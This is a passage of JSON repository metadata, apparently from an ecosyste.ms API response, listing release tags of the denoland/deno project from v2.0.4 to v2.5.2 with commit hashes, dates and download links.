commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v